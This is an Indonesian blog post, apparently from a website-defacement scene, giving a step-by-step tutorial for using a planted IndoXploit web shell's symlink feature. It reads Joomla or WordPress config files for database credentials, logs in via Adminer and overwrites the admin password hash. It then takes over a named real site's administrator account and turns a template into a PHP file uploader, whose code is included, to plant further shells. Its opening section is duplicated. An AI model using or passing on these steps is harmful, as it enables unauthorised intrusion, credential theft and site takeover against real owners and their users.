Hello guys! ^_^
Achon666ju5t was hir :v anjir hhhhh
Posting pertamah gua bakal kasih tau lu cara symlink dengan shell indoXploit recoded by D4RKNE555
Bahan ->
1).Shell IndoXploit Recoded by D4RKNE55 download disini gan -> http://picocurl.com/MPr
2).Apalagi ya ? Dah lah itu aja. Wkwkw
Proof of concept ->
Saya anggap agan udah punya shell tanem di suatu website entah itu poc apa terserah :D
1).upload ulang Shell yg tadi agan copy paste lalu akses shellnya
2). Lalu agan klik symlink seperti di gambar sorry gan ane android user belom kebeli pc :'( ->
5). Selanjutnya agan cari configuration.php (joomla) atau wp-config.php (Wordpress) kebetulan disini saya mendapat Target symlink joomla lalu saya klik Configuration.php maka keluarlah seperti ini :
Tuhkan langsung keliatan $sitename $dbuser nya.
6). Lalu agan buka adminer (untuk login database) seperti di gambar lalu masukan $dbuser $dbpassword $dbname pada configuration tadi di adminer :
7). Dan taraaaaaa masumlah kita ke dalan database website tersebut. Lalu agan cari _user ( Untuk adminweb login ) dan klik _user
$P$ByVyYSHmNAMEFjDtJT30IrRN5uh/Cg1 -> goldstar . Lalu agan klik save dan berhasil :D
Achon666ju5t was hir :v anjir hhhhh
Posting pertamah gua bakal kasih tau lu cara symlink dengan shell indoXploit recoded by D4RKNE555
Bahan ->
1).Shell IndoXploit Recoded by D4RKNE55 download disini gan -> http://picocurl.com/MPr
2).Apalagi ya ? Dah lah itu aja. Wkwkw
Proof of concept ->
Saya anggap agan udah punya shell tanem di suatu website entah itu poc apa terserah :D
1).upload ulang Shell yg tadi agan copy paste lalu akses shellnya
2). Lalu agan klik symlink seperti di gambar sorry gan ane android user belom kebeli pc :'( ->
3). Nanti keluar tuh kek gini gan :
4). Agan klik salah 1 symlink nya . Maka akan terbuka dir /publik_html/ di website tersebut :
5). Selanjutnya agan cari configuration.php (joomla) atau wp-config.php (Wordpress) kebetulan disini saya mendapat Target symlink joomla lalu saya klik Configuration.php maka keluarlah seperti ini :
Tuhkan langsung keliatan $sitename $dbuser nya.
6). Lalu agan buka adminer (untuk login database) seperti di gambar lalu masukan $dbuser $dbpassword $dbname pada configuration tadi di adminer :
7). Dan taraaaaaa masumlah kita ke dalan database website tersebut. Lalu agan cari _user ( Untuk adminweb login ) dan klik _user
8). Disini si admin nya menggunakan hash . Lalu agan edit password nya dengan cara klik edit -> pilih data/select data . Laluubah passwordnya menjadi ini :
$P$ByVyYSHmNAMEFjDtJT30IrRN5uh/Cg1 -> goldstar . Lalu agan klik save dan berhasil :D
9). Agan buka website tadi yg ada di configuration.php . Disini saya mendapatkan usm.co.id/administrator (joomla)
10). lalu masukan di database tadi yang _user itu . Disini saya mendapatkan username : administrator dan password : goldstar ( setelah tadi di rubah )
Dan login lah di administrator website. Daaaaaaannnnn. Taraaaaa agan sudah menjadi superadmin di website target
11). Lalu agan cari template seperti di bawah :
12). Lalu klik edit main page template :
Maka editlah. Dan rubah dengan script uploader :
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
else { echo '<b>Gagal Upload!!!</b><br><br>'; }
}
?>
Maka langsung deh jadi uploader tuh template hahahaha
Terus agan upload aja shell agan . Terserah mau shell apa hahaha. Dan kalo udah nanem shell terserah lah mau ngapain ( tapi inget kalo dapet site indonesia. Cukup nitip file sadja ya gan ;)
Dan begini lah hasil saya symlink tadi :D
Oke sekian tutorial lama ini saya publish kembali karena saya liat masih banyak orang tidak mengetahui teknik ini .
Thanx to : D4RKNE55 - ./MaulaniKartika07 ( Yang ngasih kuota buat bikin tutorial ini wkoakaokwoa )
Demo : http://picocurl.com/MOz
Sekian gan terima kasih :)
Tag :
Deface
0 Komentar untuk "Tutorial Symlink Pada Suatu Website Yang Sudah Tertanam Shell"